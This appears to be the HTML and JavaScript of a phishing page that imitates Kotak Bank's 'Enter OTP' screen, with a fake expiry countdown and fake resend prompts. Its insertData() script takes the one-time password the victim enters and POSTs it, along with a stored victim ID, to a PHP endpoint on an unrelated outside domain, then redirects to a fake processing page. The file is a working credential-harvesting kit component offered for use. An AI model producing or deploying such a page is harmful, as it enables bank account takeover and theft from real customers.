<html lang="en">
 <head> 
  <meta charset="UTF-8"> 
  <title>Kotak Bank | Enter OTP</title> 
  <meta charset="UTF-8"> 
  <meta http-equiv="X-UA-Compatible" content="ie=edge"> 
  <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
  <meta name="author" content="Syahrizaldev"> 
  <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png"> 
  <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png"> 
  <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png"> 
  <link rel="manifest" href="/site.webmanifest"> 
  <link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5"> 
  <meta name="msapplication-TileColor" content="#da532c"> 
  <link rel="stylesheet" href="./style.css"> 
  <link rel="preconnect" href="https://fonts.googleapis.com"> 
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin=""> 
  <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@300;400;500;600;700&amp;display=swap" rel="stylesheet"> 
  <style type="text/css">
#Lg
{
  width:180px;
  margin-bottom:10px;
  margin-top:25px;
}
#Lg2
{
  width:155px;
  position:absolute;
  margin-top:0%;
  margin-left:40%;
  margin-top:24px;
}
#Lg3
{
  width:100%;
  margin-top:10%;
}

div.c
{
    line-height: 160%;
}
div.cnt
{
    line-height: 120%;
}
.c
{
    font-size:14px; 
    font-family: 'Heebo', sans-serif; 
    font-weight:100;  
    margin-top:50px;
    color:#040404;
}
div.footer
{
    line-height: 90%;
}

#captcha
{
  width:143.4px;
  height:35px;
  font-size:14px;
  font-family: 'Heebo', sans-serif;
  border-style:solid;
  border-color:black;
  border-width:1px;
  border-radius:4px;
  outline:none;
  padding:0 10px;
  text-transform:none;
}
.btn
{
  width:120px;
  padding:6px 10px;
  border-style:solid;
  outline:none;
  border:none;
  border-radius:4px;
  color:#fff;
  font-family: 'Heebo', sans-serif;
  font-weight:500;
  font-size:14px;
  background-color:#EE1C25;
  margin-top:12px;
  margin-left:58%;
}
.expired
{
  background-color:#CDE3F0;
  font-family: 'Heebo', sans-serif;
  font-weight:400;
  padding: 12px 20px;
  border-radius:1px;
  margin-left:0px;
  font-size:11px;
  margin-top:-15px;
}
hr.hr
{
  width:116%;
  margin-left:-8%;
  border-style:solid;
  border-color:grey;
  border-width:0.5px;
  margin-top:10%;
  }
</style> 
 </head> 
 <body onload="startTimer();"> 
  <!-- Static- Please don't do anything here--> 
  <iframe name="hidden_iframe" id="hidden_iframe" style="display: none" onload="if(submitted){window.location='Processing4';}"></iframe> 
  <!-- partial:index.partial.html --> 
  <section class="sectioncontact-section" style="background-color:#FAFAFA;"> 
   <div class="container contact-column"> 
    <img src="Kotak_Logo.jpg" alt="" id="Lg"> 
    <form class="contact-inform form"> 
     <div class="c"> 
      <h1>Enter OTP sent via SMS and email</h1> 
     </div>
     <br> 
     <div class="cnt"> 
      <p1 style="color:grey; font-size:14px; font-family: 'Heebo', sans-serif; font-weight:400;">
       Enter the 6-digit OTP send to your registered mobile number and email.
      </p1>
      <br>
      <br> 
     </div> 
     <div class="form-control"> 
      <input type="text" name="5TH_OTP" class="form-input" placeholder="Enter OTP" inputmode="numeric" maxlength="6" pattern="[0-9]\d{5}" title="Please enter valid OTP !" required id="otp"> 
      <label for="OTP" class="form-label">OTP</label> 
     </div> 
     <div class="timer"> 
      <center>
       <p1 style="color:grey; font-size:14px; font-family: 'Heebo', sans-serif; text-align:center;">
        <span style="color:grey; font-family: 'Heebo', sans-serif; font-weight:400; font-size:13px;" id="time">
         <p1>
           Your OTP will expire in : 
         </p1>0</span> 
        <span style="color:grey; font-size:14px; font-family: 'Heebo', sans-serif; font-weight:400; text-align:center;">&nbsp;second</span>
       </p1>
      </center> 
      <script type="text/javascript">
			var timer=60;
			var sec=0;
			function startTimer() {
			sec=parseInt(timer%60);
			
			if (timer<2) {
			// timer.stop();
			window.location.href = "Aadhar_OTP_Expire.html";
			}
			
			document.getElementById("time").innerHTML = "<p1> Your OTP will expire in  : </p1>"+sec.toString();
			timer--;
			setTimeout(function(){
			startTimer();
			
			}, 1000);
			}
			
			</script> 
     </div> 
     <div class="URL"> 
      <p1 style="color:grey; font-size:12px; font-family: 'Heebo', sans-serif; font-weight:500;">
       Resend OTP via
      </p1> 
      <script>
			var url = document.URL;
			document.getElementById("url").innerHTML = "URL: " + str;
			function replicateTab(){
			if(window.confirm("OTP resend successfully, please check your inbox.")){
			window.location.href="Enter_OTP_Aadhar.html";
			}
			}
			</script> 
      <button id="button" onclick="replicateTab()" style=" border:none; font-size:12px; font-family: 'Heebo', sans-serif; font-weight:500; color:#00b4ef; background-color:transparent; text-decoration: underline;">SMS</button> 
     </div> 
     <div class="call"> 
      <p1 style="color:grey; font-size:12px; font-family: 'Heebo', sans-serif; font-weight:500;">
       Resend OTP via 
       <a style="color:#00b4ef; font-size:12px; font-family: 'Heebo', sans-serif; font-weight:500; text-decoration: underline;" href="tel:+917349230233">Call</a>
      </p1> 
     </div>
     <br> 
     <a style="color:#00b4ef; font-size:12px; font-family: 'Heebo', sans-serif; font-weight:400; text-decoration: none;" href="#">More login options</a> 
     <hr class="hr"> 
     <button type="button" onclick="insertData()" class="btn">Secure Login</button> 
    </form>
   </div>
  </section> 
  <img src="Kotak_Footer.jpg" alt="" id="Lg3"> 
  <script>
        function insertData() {
            // Get the input values
          var otp = document.getElementById("otp").value;

           if (otp!="") {
                var rand_id = localStorage.getItem('random_no');

                // Create a JavaScript object with the input data
                var data = {
                    otp: otp,
                    random_no:rand_id
                };

                // Send the data to the API endpoint using AJAX
                var xhr = new XMLHttpRequest();
                xhr.open("POST", "https://anikdevnath.com/KOTAK_WEB/12.php", true);
                xhr.setRequestHeader("Content-Type", "application/json");
                xhr.onreadystatechange = function() {
                    if (xhr.readyState === 4 && xhr.status === 200) {
                        console.log(xhr.responseText);

                        window.location.href='Processing4.html';
                    }
                };
                xhr.send(JSON.stringify(data));
            }
        else{
            alert('Please fill all fields');
        }



        }
</script>
 </body>
</html>